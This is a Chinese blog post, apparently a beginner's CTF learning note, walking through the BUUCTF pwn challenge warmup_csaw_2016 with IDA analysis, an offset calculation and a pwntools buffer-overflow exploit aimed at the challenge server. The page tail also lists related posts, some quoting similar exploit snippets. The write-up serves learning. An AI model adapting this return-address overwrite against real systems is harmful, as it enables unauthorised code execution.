PWN学习记录(3)BUUCTF-warmup_csaw_2016

已于 2023-09-22 16:12:48 修改
阅读量372 收藏 1
点赞数
文章标签: 学习 ubuntu linux 网络安全 笔记
于 2023-08-01 21:54:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58824086/article/details/132051291
版权

文章目录


在这里插入图片描述

1、在终端中使用命令查看warmup_csaw_2016

下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制

$ file warmup_csaw_2016
$ checksec ./warmup_csaw_2016

在这里插入图片描述
可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出

运行该文件:
在这里插入图片描述

2、在IDA中查看warmup_csaw_2016

将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。没有发现 /bin/sh,但找到了cat flag.txt
在这里插入图片描述
双击cat flag.text
在这里插入图片描述
来自sub_40060D
打开sub_40060D,F5反编译
在这里插入图片描述
果然是system函数,可以看到这个函数的功能就是输出flag,记录下他的地址 flag_addr=0x40060D
回到sub_40060D的图形化界面
在这里插入图片描述
双击rbp,弹出界面
在这里插入图片描述
得到返回地址0x40060D

打开main函数,F5反编译
在这里插入图片描述
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。
偏移量为:64 + 8 = 72 (64位+8;32位+4)
//由函数可得输出了v5,gets函数并没有限制长度,因此存在溢出漏洞。v5的大小是0x40,因此只要我们输入的字符串长度=0x40+8(64位ebp的长度)即可溢出到返回地址,再将返回地址覆盖输出flag的那个函数地址即可
参考:https://blog.csdn.net/BangSen1/article/details/112630600

3、编写exp,夺flag

from pwn import *
p = remote('node4.buuoj.cn', 26353)
payload = b'a' * (72) + p64(0x40060D) //或者b'a' * (0x40+8) + p64(0x40060D)或者b'a' * (64+8) + p64(0x400611) 
p.sendline(payload)
p.interactive()

问题:这里返回地址这几个都能得出flag?等待补充
在这里插入图片描述

打开终端,输入vim 1.py 创建一个python文件(命名随意)

$ vim 1.py

将exp文件输入进1.py中,Esc+:wq保存并退出1.py

运行代码

$ python3 1.py

在这里插入图片描述
将得到的flag复制到题目的flag框中:

flag{2035cb75-98aa-46ae-8cf0-61c471c94ad}

在这里插入图片描述

YunLie_zm
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
warmup_csaw_2016
weixin_56301399的博客
07-20 1330
做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。偏移量的计算=(数组本身大小+对应位的偏移64位是ox8)然后加上我们系统调用函数的地址。...
buuctf [HCTF 2018]WarmUp 1 解题思路
最新发布
2301_76899943的博客
05-13 352
flag.php,先检测flag.php能否包含,不能就包含…/flag.php,以此类推。,就在参数page的末尾加上?substr函数的意思就是截取字符串,截取从第0个字符串开始 长度为strpod函数给出的数字 的字符串。检查源代码可以看到有source.php的提示,那么直接打开source.php。这里要注意这个include函数,如果文件无法读取,会向后读取文件。只允许包含白名单的文件,有source.php和hint.php。(实力较弱,如有表述错误的,恳请大佬指点~~!
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 394
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 461
buuctf pwn
warmup_csaw_2016解题思路及步骤
2301_81504456的博客
02-29 363
合理选取返回地址,在字符串窗口中寻找有用数据信息。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF web之WarmUp 源代码详解
good good study
11-18 2350
前言前言访问除了一张滑稽图,就没其他的了查看源码,有一个注释了的 source.php,可以尝试直接访问一下。同时进行目录扫描访问source.php,里面包含php代码,题目说了是php代码审计,那就先从这里进行分析提取其中的php代码代码分析1. 代码整体结构分析前面两个条件很好满足,只需要 source.php?file=字符串 ,即可。所以重点需要让checkeFile函数返回true,则会进行文件包含2. chechkFile()函数分析。
BUUCTF-WarmUp
硫酸超的博客
11-20 5098
BUUCTF-WarmUp(代码审计) 1、打开靶场后,查看源码即可看到 <!--source.php--> 2、进入sourcep.php 代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.ph
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1661
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
Pwn | CTF】BUUCTF warmup_csaw_2016
weixin_46301214的博客
02-04 422
天命:第二题pwn,这次知道了目标就是瞄准system函数,如果里面是 /bin/sh 之类的就是直接getshell,如果是普通命令的话,应该就是getflag了。点进去变量,然后这里开始我就不懂了,别人wp就说这里是40空间+8空间(8空间就是覆盖64位下rbp的长度)sub_40060D这个函数就是重点,点进去一看就是我们的目标system("cat flag.txt")那就要拿到两个东西:sub_40060D函数的入口地址 和 v5变量的缓冲区大小。条件一:获取sub_40060D函数入口地址。
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
XDiku的博客
11-01 1308
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3058
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
buuoj warmup_csaw_2016
weixin_52942048的博客
10-15 96
(1)v5的长度是40(双击点进去就可以看到长度)这里确定执行 cat flag.txt的地址即可。(2)返回地址8个字节。
BUUCTF web题目 之WarmUp
m0_54993799的博客
12-10 910
BUUCTF web题目之WarmUp
BUUCTF——Warmup
weixin_44866139的博客
04-30 1311
Warmup <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint....
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值